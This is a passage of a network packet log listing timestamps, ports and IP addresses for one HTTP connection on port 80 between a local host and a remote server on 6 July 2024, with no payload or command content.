Jul 6, 2024 13:27:15.593046904 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.593059063 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.593070030 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.593100071 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.593199015 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.593836069 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.593847990 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.593858957 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.593883038 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.593921900 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.594016075 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.594028950 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.594039917 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.594052076 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.594067097 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.594085932 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.594700098 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.594715118 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.594727993 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.594758034 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.594835043 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.594847918 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.594858885 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.594872952 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.594885111 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.594913960 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.594989061 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.595001936 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.595021963 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.595670938 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.599697113 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.632497072 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.632518053 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.632530928 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.632576942 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.678183079 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.678195000 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.678255081 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.678567886 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.678596020 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.678608894 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.678636074 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.678755045 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.678771973 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.678783894 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.678797007 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.678805113 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.678837061 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.678910017 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.678922892 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.678934097 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.678952932 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.678956985 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.678975105 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.678977966 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.678988934 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.679033041 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.679178953 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.679227114 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.679291010 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.679303885 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.679326057 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.679337978 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.679346085 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.679366112 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.679378986 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.679380894 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.679419041 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.679543018 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.679554939 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.679567099 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.679579020 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.679586887 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.679595947 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.679610014 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.679620981 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.679656029 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.680067062 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.680130959 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.680143118 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.680181026 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.680255890 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.680267096 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.680278063 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.680291891 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.680299997 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.680315971 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.680452108 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.680469036 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.680485964 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.680497885 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.680502892 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.680511951 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.680535078 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.680561066 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.680989027 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681001902 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681015015 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681037903 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.681085110 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681097031 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681108952 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681122065 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681134939 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.681152105 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.681221008 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681281090 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.681305885 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681318045 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681329966 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681343079 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681355953 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681369066 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.681401968 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.681883097 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681942940 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.681972027 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.681998968 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682012081 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682046890 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.682106972 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682120085 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682131052 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682142973 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682147980 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.682164907 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.682238102 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682323933 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682328939 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.682337046 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682348967 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682359934 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682369947 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.682415009 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.682854891 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682934046 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682945967 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682960033 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.682969093 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.682996035 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.683078051 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.683094025 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.683108091 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.683120966 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.683145046 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.683172941 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.683258057 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.683269024 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.683280945 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.683295012 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.683300972 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.683351040 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.719248056 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.719364882 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.719384909 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.719398022 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.719404936 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.719413042 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.719434023 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.765080929 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.765160084 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.765172005 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.765186071 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.765204906 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.765221119 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.765234947 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.765245914 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.765259027 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.765285969 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.765301943 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.765681982 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.765696049 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.765707970 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.765753031 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.765959978 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.765978098 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.765989065 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766000986 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.766030073 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.766103029 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766113997 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766124010 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766136885 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766164064 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.766181946 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.766305923 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766315937 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766326904 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766338110 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766349077 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766359091 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.766386986 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.766582012 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766593933 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766619921 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766634941 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766634941 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.766648054 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766654968 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.766659975 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766671896 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766683102 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766686916 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.766706944 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.766902924 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766947031 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766957998 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.766982079 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.767013073 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.767030954 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767041922 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767052889 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767066002 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767076015 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.767076969 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767088890 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767097950 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.767106056 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767118931 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767129898 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.767129898 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767158031 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.767534018 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767545938 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767556906 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767569065 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767580032 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.767580032 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767599106 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767611027 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767620087 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.767622948 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767636061 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767647982 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.767647982 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.767654896 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.767684937 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.768014908 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.768027067 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.768050909 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.768058062 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.768064976 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.768079996 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.768090963 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.768098116 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.768104076 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.768116951 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.768126965 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.768130064 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.768143892 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.768156052 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.768158913 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.768181086 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.768196106 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.768388033 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.771989107 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772001028 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772013903 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772046089 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.772073984 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.772178888 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772192001 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772202969 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772216082 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772227049 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772238016 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.772264004 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.772303104 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772372007 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772381067 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.772382975 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772397041 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772409916 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772420883 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772423029 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.772433996 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772442102 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.772447109 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772464037 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772490025 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772490025 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.772502899 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772512913 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.772538900 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.772701979 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772716045 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772775888 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772787094 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772789001 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.772800922 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772818089 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.772898912 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772910118 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772922039 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772933960 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772943974 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.772945881 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.772957087 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.772989988 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.773051977 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.773063898 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.773116112 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.773118019 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.773129940 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.773140907 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.773154020 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.773160934 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.773168087 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.773178101 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.773191929 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.773220062 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.773247004 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.773299932 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.773312092 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.773320913 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.773351908 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.773364067 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.851958036 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.851982117 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.851993084 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.852034092 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.852128029 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.852144003 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.852155924 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.852168083 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.852178097 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.852200985 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.852319002 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.852332115 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.852364063 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.852375984 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.852380991 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.852386951 CEST	80	49739	192.3.140.185	192.168.2.4
